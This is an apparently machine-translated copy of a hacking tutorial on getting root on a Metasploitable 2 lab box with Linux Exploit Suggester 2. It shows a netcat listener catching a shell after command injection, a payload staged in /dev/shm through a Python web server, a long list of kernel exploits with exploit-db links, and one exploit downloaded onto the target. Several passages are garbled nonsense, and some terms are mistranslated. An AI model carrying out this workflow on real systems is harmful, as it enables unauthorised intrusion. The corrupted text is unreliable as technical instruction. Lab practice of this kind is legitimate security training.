قالب وردپرس درنا توس
Home / Tips and Tricks / Searching for exploits and getting root with Linux Exploit Suggester «Null Byte :: WonderHowTo

Searching for exploits and getting root with Linux Exploit Suggester «Null Byte :: WonderHowTo



Privilege escalation is one of the essential skills that a hacker can have and often separates the newcomers from the pros. With a constantly changing landscape and an abundance of exploits out there, it can be a problematic aspect of any attack. Fortunately, some tools can speed up the process. One, Linux Exploit Suggester, is just one of many to help you become root.

Privilege escalation is gaining access to the rights of another user on the system. It comes in two flavors: horizontal and vertical escalation of privileges.

Horizontal escalation of privileges is when an attacker gains access to another user account, usually with the same status and permissions. It can give them access to additional systems or data, but is not as serious as its vertical cousin. Vertical privilege escalation is when an attacker gains access to an account with elevated privileges, such as that of a system administrator.

Privilege escalation, especially the vertical, is vital for the attacker because it allows them to do things that an average user could not. Unless the system is poorly configured, standard users usually cannot execute malicious code or configure the system in dramatic ways that would benefit an attacker. That is why escalation of privileges is vital to the full compromise of a goal.

Step 1
: The setup and initial compromise

To start with, we use Metasploitable 2 as the target and Kali Linux as our local device. You can use a similar setup. When we're done, we need to download Linux Exploit Suggester from GitHub.

Let us assume that the target has restricted access to the Internet, so we must first have it on our local machine and transfer it to the target later. We can use wget to download the script directly from the terminal:

  ~ # wget https://raw.githubusercontent.com/jondonas/linux-exploit-suggester-2/master/linux- exploit -suggester-2.pl

--2020-02-18 12: 15: 58-- https://raw.githubusercontent.com/jondonas/linux-exploit-suggester-2/master/linux-exploit-suggester-2.pl
Resolving Raw.githubusercontent.com (raw.githubusercontent.com) ... 151,101,148,133
Connect to raw.githubusercontent.com (raw.githubusercontent.com) | 151.101.148.133 |: 443 ... connected.
HTTP request sent, awaiting response ... 200 OK
Length: 24780 (24K) [text/plain]
Save in: "linux-exploit-suggester-2.pl"

linux-exploit-suggester-2.pl 100% [======================================================================================================================>] 24.20K --.- KB / s in 0.03s

2020-02-18 12:15:58 (718 KB / s) - "linux-exploit-suggester-2.pl" saved [24780/24780]

Now we have to compromise the goal and get shell access. Command injection is always a nice option. After we find the incoming connection, we can verify that we are the user www-data with the command id :

  ~ # nc -lvnp 4321

listen on [any] 4321 ...
connect with [10.10.0.1] from (UNKNOWN) [10.10.0.50] 36302
ID card
uid = 33 (www-data) gid = 33 (www-data) groups = 33 (www-data) 

From here we want to upgrade to a fully interactive TTY shell so that we have more control and can use the tab completion , order history, etc. After we have upgraded our shell, we can navigate to a world-writable folder so that we can receive and eventually execute the tool:

  www-data @ metasploitable: / var / www / dvwa / vulnerabilities / exec $ cd / dev / shm 

Step 2: transfer the script to the target

Let's rename the script on our local computer to something shorter:

  ~ # mv linux-exploit-suggester-2. pl les2.pl 

Now we can operate the script with Python & # 39; s SimpleHTTPServer module – use the switch -m to specify the module:

  ~ # python -m SimpleHTTPServer

Serve on HTTP on 0.0.0.0 port 8000 ... 

That will display all contents in the folder via HTTP on port 8000.

Back on the target we can use wget again to run the script from our local machine:

  www-data @ metasploitable: / dev / shm $ wget http://10.10.0.1:8000/les2.pl

- 13: 43: 17-- http://10.10.0.1:8000/les2.pl
=> `les2.pl & # 39;
Connect with 10.10.0.1:8000 ... connected.
HTTP request sent, awaiting response ... 200 OK
Length: 24.780 (24K) [text/x-perl]

100% [=========================================================================================================================================================================>] 24,780 - .-- K / s

13:43:18 (70.47 MB ​​/ s) - `les2.pl & # 39; saved [24780/24780]

Once that is complete, we can kill the Python server. Now we can view the current permissions of our script that we have just transferred:

  www-data @ metasploitable: / dev / shm $ ls -la

total 28
drwxrwxrwt 2 root root 60 jun 19 13:43.
drwxr-xr-x 13 root root 13480 19 June 13:28 ..
-rw-r - r-- 1 www-data www-data 24780 February 18, 2020 les2.pl 

We can see that it is currently read-only, so use the command chmod to make it executable:

  www-data @ metasploitable: / dev / shm $ chmod + x les2.pl 

We are finally ready to execute the script.

Step 3: Run Linux Exploit Suggester

Because we made it executable, we can use the dot-slash to run Linux Exploit Suggester. Use the -h flag to view the help menu and usage example:

  www-data @ metasploitable: / dev / shm $ ./les2.pl -h

#############################
Linux Exploit Suggester 2
#############################

Use: ./les2.pl [-h] [-k kernel] [-d]

  [-h]   Help (this post)
Kernel number (e.g. 2.6.28)
[-d] Open exploit download menu

You can also provide a partial kernel version (eg 2.4)
to view all available exploits. 

The easiest way to use the tool is to work without options:

  www-data @ metasploitable: / dev / shm $ ./les2.pl

#############################
Linux Exploit Suggester 2
#############################

Local kernel: 2.6.24
72 exploits search ...

Possible exploits
[1] American sign language
CVE-2010-4347
Source: http://www.securityfocus.com/bid/45408
[2] can_bcm
CVE-2010-2959
Source: http://www.exploit-db.com/exploits/14814
Dirty_cow
CVE-2016-5195
Source: http://www.exploit-db.com/exploits/40616
[4] do_pages_move
Alt: sieve CVE-2010-0415
Source: Spenders Enlightenment
[5] exploit_x
CVE-2018-14,665
Source: http://www.exploit-db.com/exploits/45697
[6] half_nelson1
Alt: econet CVE-2010-3848
Source: http://www.exploit-db.com/exploits/17787
[7] half_nelson2
Alt: econet CVE-2010-3850
Source: http://www.exploit-db.com/exploits/17787
[8] half_nelson3
Alt: econet CVE-2010-4073
Source: http://www.exploit-db.com/exploits/17787
Msr
CVE-2013-0268
Source: http://www.exploit-db.com/exploits/27297
[10] pipe.c_32bit
CVE-2009-3547
Source: http://www.securityfocus.com/data/vulnerabilities/exploits/36901-1.c
Pktcdvd
CVE-2010-3437
Source: http://www.exploit-db.com/exploits/15150
[12] Reiserfs
CVE-2010-1146
Source: http://www.exploit-db.com/exploits/12130
[13] sock_sendpage
Alt: wunderbar_emporium CVE-2009-2692
Source: http://www.exploit-db.com/exploits/9435
[14] sock_sendpage2
Alt: proto_ops CVE-2009-2692
Source: http://www.exploit-db.com/exploits/9436
[15] video4linux
CVE-2010-3081
Source: http://www.exploit-db.com/exploits/15024
[16] vmsplice1
Alt: jessica biel CVE-2008-0600
Source: http://www.exploit-db.com/exploits/5092
[17] vmsplice2
Alt: diane_lane CVE-2008-0600
Source: http://www.exploit-db.com/exploits/5093 Blonde19659011 right-fillingLinuxExploitSuggesterworkdough the kernelversiongatchingesetheitcompare with a list with possibleexploitsHere aboveweighingin the handful of potentialexploitsheyeturned11911. Let us confirm the kernel number with the command  uname -r : 

  www-data @ metasploitable: / dev / shm $ uname -r

2.6.24-16 server 

Instead of using the exact version number, we can shorten it to 2.6 because systems are often vulnerable to slightly older exploits:

  www-data @ metasploitable: / dev / shm $ ./les2.pl -k 2.6

#############################
Linux Exploit Suggester 2
#############################

Local kernel: 2.6
72 exploits search ...

Possible exploits
American sign language (2.6.0)
CVE-2010-4347
Source: http://www.securityfocus.com/bid/45408
[2] can_bcm (2.6.18)
CVE-2010-2959
Source: http://www.exploit-db.com/exploits/14814
[3] caps_to_root (2.6.34)
CPU-N / a
Source: http://www.exploit-db.com/exploits/15916
Dirty_cow (2.6.22)
CVE-2016-5195
Source: http://www.exploit-db.com/exploits/40616
[5] do_pages_move (2.6.18)
Alt: sieve CVE-2010-0415
Source: Spenders Enlightenment
[6] elfcd (2.6.12)
[7] exit_notify (2.6.25)
Source: http://www.exploit-db.com/exploits/8369
Exp.sh (2.6.9)
[9] exploit_x (2.6.22)
CVE-2018-14,665
Source: http://www.exploit-db.com/exploits/45697
[10] ftrex (2.6.11)
CVE-2008-4210
Source: http://www.exploit-db.com/exploits/6851
H00lyshit (2.6.8)
CVE-2006-3626
Source: http://www.exploit-db.com/exploits/2013
[12] half_nelson1 (2.6.0)
Alt: econet CVE-2010-3848
Source: http://www.exploit-db.com/exploits/17787
[13] half_nelson2 (2.6.0)
Alt: econet CVE-2010-3850
Source: http://www.exploit-db.com/exploits/17787
[14] half_nelson3 (2.6.0)
Alt: econet CVE-2010-4073
Source: http://www.exploit-db.com/exploits/17787
Kdump (2.6.13)
[16] krad (2.6.5)
Krad3 (2.6.5)
Source: http://exploit-db.com/exploits/1397
Local26 (2.6.13)
Memodipper (2.6.39)
CVE-2012-0056
Source: http://www.exploit-db.com/exploits/18411
Msr (2.6.18)
CVE-2013-0268
Source: http://www.exploit-db.com/exploits/27297
News smp (2.6)
[22] approx_bak (2.6.5)
[23] pipe.c_32bit (2.6.15)
CVE-2009-3547
Source: http://www.securityfocus.com/data/vulnerabilities/exploits/36901-1.c
Pktcdvd (2.6.0)
CVE-2010-3437
Source: http://www.exploit-db.com/exploits/15150
Prctl (2.6.13)
Source: http://www.exploit-db.com/exploits/2004
Prctl2 (2.6.13)
Source: http://www.exploit-db.com/exploits/2005
Prctl3 (2.6.13)
Source: http://www.exploit-db.com/exploits/2006
Prctl4 (2.6.13)
Source: http://www.exploit-db.com/exploits/2011
Ptrace_kmod2 (2.6.26)
Alt: ia32syscall, robert_you_suck CVE-2010-3301
Source: http://www.exploit-db.com/exploits/15023
[30] pwned (2.6.11)
Py2 (2.6.9)
[32] raptor_prctl (2.6.13)
CVE-2006-2451
Source: http://www.exploit-db.com/exploits/2031
RawmodePTY (2.6.31)
CVE-2014-0196
Source: http://packetstormsecurity.com/files/download/126603/cve-2014-0196-md.c
[34] rds (2.6.30)
CVE-2010-3904
Source: http://www.exploit-db.com/exploits/15285
Reiserfs (2.6.18)
CVE-2010-1146
Source: http://www.exploit-db.com/exploits/12130
[36] SCTP (2.6.26)
CVE-2008-4113
Semtex (2.6.37)
CVE-2013-2094
Source: http://www.exploit-db.com/exploits/25444
[38] sock_sendpage (2.6.0)
Alt: wunderbar_emporium CVE-2009-2692
Source: http://www.exploit-db.com/exploits/9435
[39] sock_sendpage2 (2.6.0)
Alt: proto_ops CVE-2009-2692
Source: http://www.exploit-db.com/exploits/9436
Stackgrow2 (2.6.10)
Udev (2.6.25)
Alt: udev <1.4.1 CVE-2009-1185
Source: http://www.exploit-db.com/exploits/8478
Udp_sendmsg_32bit (2.6.1)
CVE-2009-2698
Source: http://downloads.securityfocus.com/vulnerabilities/exploits/36108.c
Uselib24 (2.6.10)
Vconsole (19459099)
CVE-2009-1046
Video4linux (2.6.0)
CVE-2010-3081
Source: http://www.exploit-db.com/exploits/15024
[46] vmsplice1 (2.6.17)
Alt: jessica biel CVE-2008-0600
Source: http://www.exploit-db.com/exploits/5092
[47] vmsplice2 (2.6.23)
Alt: diane_lane CVE-2008-0600
Source: http://www.exploit-db.com/exploits/5093 blonde19659011/01 We can see that there is a lot of potential pool of potential exploitation of the league19659002. Use the  -d  flag to enable the option: 

  www-data @ metasploitable: / dev / shm $ ./les2.pl -k 2.6 -d

#############################
Linux Exploit Suggester 2
#############################

Local kernel: 2.6
72 exploits search ...

Possible exploits
American sign language (2.6.0)
CVE-2010-4347
Source: http://www.securityfocus.com/bid/45408
[2] can_bcm (2.6.18)
CVE-2010-2959
Source: http://www.exploit-db.com/exploits/14814
[3] caps_to_root (2.6.34)
CPU-N / a
Source: http://www.exploit-db.com/exploits/15916
Dirty_cow (2.6.22)
CVE-2016-5195
Source: http://www.exploit-db.com/exploits/40616
[5] do_pages_move (2.6.18)
Alt: sieve CVE-2010-0415
Source: Spenders Enlightenment
[6] elfcd (2.6.12)
[7] exit_notify (2.6.25)
Source: http://www.exploit-db.com/exploits/8369
Exp.sh (2.6.9)
[9] exploit_x (2.6.22)
CVE-2018-14,665
Source: http://www.exploit-db.com/exploits/45697
[10] ftrex (2.6.11)
CVE-2008-4210
Source: http://www.exploit-db.com/exploits/6851
H00lyshit (2.6.8)
CVE-2006-3626
Source: http://www.exploit-db.com/exploits/2013
[12] half_nelson1 (2.6.0)
Alt: econet CVE-2010-3848
Source: http://www.exploit-db.com/exploits/17787
[13] half_nelson2 (2.6.0)
Alt: econet CVE-2010-3850
Source: http://www.exploit-db.com/exploits/17787
[14] half_nelson3 (2.6.0)
Alt: econet CVE-2010-4073
Source: http://www.exploit-db.com/exploits/17787
Kdump (2.6.13)
[16] krad (2.6.5)
Krad3 (2.6.5)
Source: http://exploit-db.com/exploits/1397
Local26 (2.6.13)
Memodipper (2.6.39)
CVE-2012-0056
Source: http://www.exploit-db.com/exploits/18411
Msr (2.6.18)
CVE-2013-0268
Source: http://www.exploit-db.com/exploits/27297
News smp (2.6)
[22] approx_bak (2.6.5)
[23] pipe.c_32bit (2.6.15)
CVE-2009-3547
Source: http://www.securityfocus.com/data/vulnerabilities/exploits/36901-1.c
Pktcdvd (2.6.0)
CVE-2010-3437
Source: http://www.exploit-db.com/exploits/15150
Prctl (2.6.13)
Source: http://www.exploit-db.com/exploits/2004
Prctl2 (2.6.13)
Source: http://www.exploit-db.com/exploits/2005
Prctl3 (2.6.13)
Source: http://www.exploit-db.com/exploits/2006
Prctl4 (2.6.13)
Source: http://www.exploit-db.com/exploits/2011
Ptrace_kmod2 (2.6.26)
Alt: ia32syscall, robert_you_suck CVE-2010-3301
Source: http://www.exploit-db.com/exploits/15023
[30] pwned (2.6.11)
Py2 (2.6.9)
[32] raptor_prctl (2.6.13)
CVE-2006-2451
Source: http://www.exploit-db.com/exploits/2031
RawmodePTY (2.6.31)
CVE-2014-0196
Source: http://packetstormsecurity.com/files/download/126603/cve-2014-0196-md.c
[34] rds (2.6.30)
CVE-2010-3904
Source: http://www.exploit-db.com/exploits/15285
Reiserfs (2.6.18)
CVE-2010-1146
Source: http://www.exploit-db.com/exploits/12130
[36] SCTP (2.6.26)
CVE-2008-4113
Semtex (2.6.37)
CVE-2013-2094
Source: http://www.exploit-db.com/exploits/25444
[38] sock_sendpage (2.6.0)
Alt: wunderbar_emporium CVE-2009-2692
Source: http://www.exploit-db.com/exploits/9435
[39] sock_sendpage2 (2.6.0)
Alt: proto_ops CVE-2009-2692
Source: http://www.exploit-db.com/exploits/9436
Stackgrow2 (2.6.10)
Udev (2.6.25)
Alt: udev <1.4.1 CVE-2009-1185
Source: http://www.exploit-db.com/exploits/8478
Udp_sendmsg_32bit (2.6.1)
CVE-2009-2698
Source: http://downloads.securityfocus.com/vulnerabilities/exploits/36108.c
Uselib24 (2.6.10)
Vconsole (19459099)
CVE-2009-1046
Video4linux (2.6.0)
CVE-2010-3081
Source: http://www.exploit-db.com/exploits/15024
[46] vmsplice1 (2.6.17)
Alt: jessica biel CVE-2008-0600
Source: http://www.exploit-db.com/exploits/5092
[47] vmsplice2 (2.6.23)
Alt: diane_lane CVE-2008-0600
Source: http://www.exploit-db.com/exploits/5093

Download exploit
(Download all: & # 39; a & # 39; / Individual: & # 39; 2,4,5 & # 39; / Exit: ^ c)
Select exploits to download: 

After determining the potential exploits, we get an option to download all scripts or individual scripts. For example, if we want to download the exploit of udev we simply enter the corresponding number ID:

  Exploit Download
(Download all: & # 39; a & # 39; / Individual: & # 39; 2,4,5 & # 39; / Exit: ^ c)
Select exploits to download: 41

Download https://www.exploit-db.com/raw/8478 -> exploit_udev 

Please note that the feature requires an active internet connection, so if access is restricted in any way, it will not work. However, Linux Exploit Suggester makes it extremely easy to get the exploitscript directly to the target. From this point on it's just a matter of escalating rights to become root.

Completion

In this tutorial we learned about privilege escalation and a tool called Linux Exploit Suggester. We started with a first compromise and transferred the script to the goal. We could then run it and discuss some usage options to discover potential exploits that could be used to become root. Privilege escalation is an integral part of every hacker's methodology, and Linux Exploit Suggester is just one tool to help that end. White-Hat Hacker journey with Null Byte & # 39; s Beginner & # 39; s Guide to Mastering Linux eBook.

Buy it now for $ 49.99>

Cover image by Pedro Sandrini / Pexels

Source link